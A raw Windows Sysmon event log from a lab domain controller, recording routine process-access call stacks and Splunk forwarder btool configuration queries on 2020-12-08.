13:55:53.589{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007181Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.589{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007180Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.589{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007179Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.589{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007178Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.589{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-85E9-5FCF-2501-000000009101}4244C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007177Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.589{10ACEC4A-85E9-5FCF-2101-000000009101}43521168C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{10ACEC4A-85E9-5FCF-2501-000000009101}4244C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+14738|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+d1d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007176Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.590{10ACEC4A-85E9-5FCF-2501-000000009101}4244C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{10ACEC4A-85E9-5FCF-2101-000000009101}4352C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 10341000x80000000000000007175Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.558{10ACEC4A-85E9-5FCF-2401-000000009101}48884152C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007174Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.433{10ACEC4A-853E-5FCF-0B00-000000009101}864988C:\Windows\system32\lsass.exe{10ACEC4A-85CA-5FCF-FF00-000000009101}3936C:\Windows\system32\sppsvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25dfa|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007173Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.433{10ACEC4A-853E-5FCF-0B00-000000009101}864988C:\Windows\system32\lsass.exe{10ACEC4A-85CA-5FCF-FF00-000000009101}3936C:\Windows\system32\sppsvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007172Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.324{10ACEC4A-85E9-5FCF-1F01-000000009101}31363920C:\Windows\system32\conhost.exe{10ACEC4A-85E9-5FCF-2401-000000009101}4888C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007171Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.308{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007170Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.308{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007169Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.308{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007168Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.308{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007167Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.308{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007166Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.308{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007165Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.308{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007164Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.308{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-85E9-5FCF-2401-000000009101}4888C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007163Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.308{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007162Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.308{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007161Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.308{10ACEC4A-85E9-5FCF-2301-000000009101}6044108C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{10ACEC4A-85E9-5FCF-2401-000000009101}4888C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007160Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.322{10ACEC4A-85E9-5FCF-2401-000000009101}4888C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{10ACEC4A-85E9-5FCF-2301-000000009101}604C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool web list settings --no-log 10341000x80000000000000007159Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.308{10ACEC4A-85E9-5FCF-1F01-000000009101}31363920C:\Windows\system32\conhost.exe{10ACEC4A-85E9-5FCF-2301-000000009101}604C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007158Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.308{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007157Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.308{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007156Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.308{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007155Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 